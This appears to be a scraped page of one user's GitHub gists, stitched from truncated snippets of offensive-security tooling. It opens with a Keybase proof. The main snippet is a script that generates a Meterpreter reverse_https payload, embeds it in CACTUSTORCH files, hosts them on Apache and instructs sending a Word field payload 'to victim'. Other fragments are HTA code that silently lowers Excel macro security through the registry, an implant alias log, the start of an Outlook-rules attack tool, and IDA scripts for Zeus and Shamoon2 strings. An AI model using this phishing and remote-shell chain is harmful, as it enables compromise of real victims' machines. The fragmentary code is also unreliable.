I hereby claim:
- I am kaicastledine on github.
- I am kcsec (https://keybase.io/kcsec) on keybase.
- I have a public key ASCJYGqbSLo24CpFzGCUtCpDq4hMus71-wEju9tIkcDr9Ao
To claim this, I am signing this object:
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
PAYLOAD=$(cat payload.bin | base64 -w 0) | |
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
service apache2 start | |
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
<?xml version="1.0" encoding="utf-8" ?> | |
<otrs_package version="1.1"> | |
<Name>MyModule</Name> | |
<Version>1.0.0</Version> | |
<Vendor>My Module</Vendor> | |
<URL>http://otrs.org/</URL> | |
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
<Description Lang="en">MyModule</Description> | |
<Framework>5.x.x</Framework> |
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
I hereby claim:
To claim this, I am signing this object:
21:25:59>> aliases | |
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1] | |
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%% | |
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%% | |
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
channels : LOCAL : commands %%cmd_args%% | |
channels : ANY_REMOTE : commands %%cmd_args%% | |
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops | |
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops |
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
def decrypt(func): | |
""" | |
Decryption of zeus strings | |
""" | |
ZBOT_INDEX_MIN = 0x0 | |
ZBOT_INDEX_MAX = 0xe7 | |
data = {} | |
for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX): | |
import idc | |
def decrypt_n_comment(func, func_name): | |
""" | |
Decrypt and comment Shamoon2's strings | |
""" | |
data = {} | |
for xref in XrefsTo(LocByName(func_name)): | |
# init |